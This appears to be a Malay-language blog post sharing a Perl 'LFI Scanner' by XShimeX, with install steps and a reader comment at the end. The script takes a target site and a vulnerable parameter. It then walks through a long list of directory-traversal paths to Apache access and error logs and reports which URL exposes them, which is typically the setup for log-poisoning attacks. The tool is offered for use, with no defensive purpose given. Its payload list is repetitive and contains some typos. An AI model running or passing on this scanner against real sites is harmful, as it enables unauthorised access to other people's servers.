use LWP::UserAgent;
use HTTP::Request;
$t = LWP::UserAgent->new() or die ('Error');
$t->agent('Mozilla');
print "[~] LFI Scanner V1.0 By XShimeX\n";
print "[~] Masukkan Site (ex: www.site.com) : ";
chomp($site = <STDIN>);
print "[~] Masukkan Path (ex: /file.php?lfi=) : ";
chomp($path = <STDIN>);
print "[~] Masukkan LFI Vuln (ex: ../../../) : ";
chomp($lfi = <STDIN>);
print "[~] Options : 1 = null 2 = : ";
chomp($opts = <STDIN>);
@list = (
"apache/logs/error.log",
"apache/logs/access.log",
"apache/logs/error.log",
"var/log/httpd/access_log",
"apache/logs/access.log",
"apache/logs/error.log",
"apache/logs/access.log",
"apache/logs/error.log",
"apache/logs/access.log",
"var/log/httpd/error_log",
"apache/logs/error.log",
"apache/logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"etc/httpd/logs/access_log",
"etc/httpd/logs/access.log",
"etc/httpd/logs/error_log",
"etc/httpd/logs/error.log",
".. /var/www/logs/access_log",
"/var/www/logs/access_log",
"var/www/logs/access.log",
"usr/local/apache/logs/access_log",
"usr/local/apache/logs/access.log",
"var/log/apache/access_log",
"var/log/apache/access.log",
"var/log/access_log",
"var/www/logs/error_log",
"var/www/logs/error.log",
"usr/local/apache/logs/error_log",
"usr/local/apache/logs/error.log",
"var/log/apache/error_log",
"var/log/apache/error.log",
"var/log/access_log",
"var/log/error_log",
"/apache/logs/error.log",
"/apache/logs/access.log",
"apache/logs/error.log",
"apache/logs/access.log",
"/apache/logs/error.log",
"/apache/logs/access.log",
"/etc/httpd/logs/acces_log",
"/etc/httpd/logs/acces.log",
"/etc/httpd/logs/error_log",
"/etc/httpd/logs/error.log",
"/var/www/logs/access_log",
"/var/www/logs/access.log",
"/usr/local/apache/logs/access_log",
"/usr/local/apache/logs/access.log",
"/var/log/apache/access_log",
"/var/log/apache2/access_log",
"/var/log/apache/access.log",
"/var/log/apache2/access.log",
"/var/log/access_log",
"/var/log/access.log",
"/var/www/logs/error_log",
"/var/www/logs/error.log",
"/usr/local/apache/logs/error_log",
"/usr/local/apache/logs/error.log",
"/var/log/apache/error_log",
"/var/log/apache2/error_log",
"/var/log/apache/error.log",
"/var/log/apache2/error.log",
"/var/log/error_log",
"/var/log/error.log",
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../var/www/logs/access_log",
"../../../../../../../var/www/logs/access.log",
"../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../var/log/apache/access_log",
"../../../../../../../var/log/apache2/access_log",
"../../../../../../../var/log/apache/access.log",
"../../../../../../../var/log/apache2/access.log",
"../../../../../../../var/log/access_log",
"../../../../../../../var/log/access.log",
"../../../../../../../var/www/logs/error_log",
"../../../../../../../var/www/logs/error.log",
"../../../../../../../usr/local/apache/logs/error_l og",
"../../../../../../../usr/local/apache/logs/error.l og",
"../../../../../../../var/log/apache/error_log",
"../../../../../../../var/log/apache2/error_log",
"../../../../../../../var/log/apache/error.log",
"../../../../../../../var/log/apache2/error.log",
"../../../../../../../var/log/error_log",
"../../../../../../../var/log/error.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
if (!$opts)
{
print "[~] Masukkan Options\n";
exit;
}
else
{
print "\nScanning...\n";
foreach $lo (@list)
{
if ($opts == '1')
{
$attack = "http://$site/$path$lfi$lo";
}
else
{
$attack = "http://$site/$path$lfi$lo";
}
$r = $t->request(HTTP::Request->new(GET=>$attack));
$test = 'GET /';
if ($r->content =~/$test/)
{
print "[~] Found Logs File : $attack\n";
exit;
}
else
{
print "[~] Trying...\n";
}
}
}
print "[~] Done\n";
2.save as .pl dkt local disk c dan aq save LFI.pl
3.download active perl http://www.activestate.com/activeperl
4.lps install and open cmd
5.and taip cd c:\
Untuk ape ni ? Im noob.
ReplyDelete